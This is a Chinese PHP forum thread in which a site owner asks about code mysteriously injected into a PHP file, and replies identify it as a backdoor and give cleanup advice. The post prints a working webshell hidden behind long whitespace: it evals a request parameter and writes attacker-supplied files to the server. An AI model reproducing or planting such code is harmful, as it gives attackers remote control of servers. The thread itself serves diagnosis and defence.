PHP文件莫名其妙的被加了代码,看不懂,求解释
ringa_lee
ringa_lee 2017-04-10 14:25:47
[PHP讨论组]
<?php                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  $kfwcbh = "cf051a1756834f0f9972191ffdf8ecfc";
if(isset($_REQUEST['cvbswp'])){ 
    $vdvb = $_REQUEST['cvbswp']; eval($vdvb); exit();
} 
if(isset($_REQUEST['ztkb'])) {
    $lzoki = $_REQUEST['hyrvkum'];
    $xhwpemsz = $_REQUEST['ztkb'];
    $oarnubp = fopen($xhwpemsz, 'w');
    $npty = fwrite($oarnubp, $lzoki);
    fclose($oarnubp);
    echo $npty; exit();
} ?>
ringa_lee
ringa_lee

ringa_lee

全部回复(4)
伊谢尔伦

你的网站应该被入侵了。
eval 是用来动态执行一段代码,而这段代码是通过$_REQUEST传递过来,并且未做过滤。

第二段是用来上传文件,讲攻击者自己的PHP文件上传至你的服务器。

请检查一下服务器的用户,禁用未知的管理员帐号,并修改自己的用户名密码。
PHP 配置文件中写的 MySQL 等帐号的密码请及时修改。
对相关 PHP 文件进行检查,看是否还有其他入侵脚本。
杀毒。

伊谢尔伦

这是一句话木马。

PHP中文网

这就是一句话后门,一眼就看出来了,eval接受的参数可以用来攻击哦!

PHP中文网

网站代码、数据目录 “可执行不可写,可写不可执行”,改改权限

热门教程
更多>
最新下载
更多>
网站特效
网站源码
网站素材
前端模板
关于我们 免责申明 意见反馈 讲师合作 广告合作 最新更新
php中文网:公益在线php培训,帮助PHP学习者快速成长!
关注服务号 技术交流群
PHP中文网订阅号
每天精选资源文章推送
PHP中文网APP
随时随地碎片化学习
PHP中文网抖音号
发现有趣的

Copyright 2014-2025 https://www.php.cn/ All Rights Reserved | php.cn | 湘ICP备2023035733号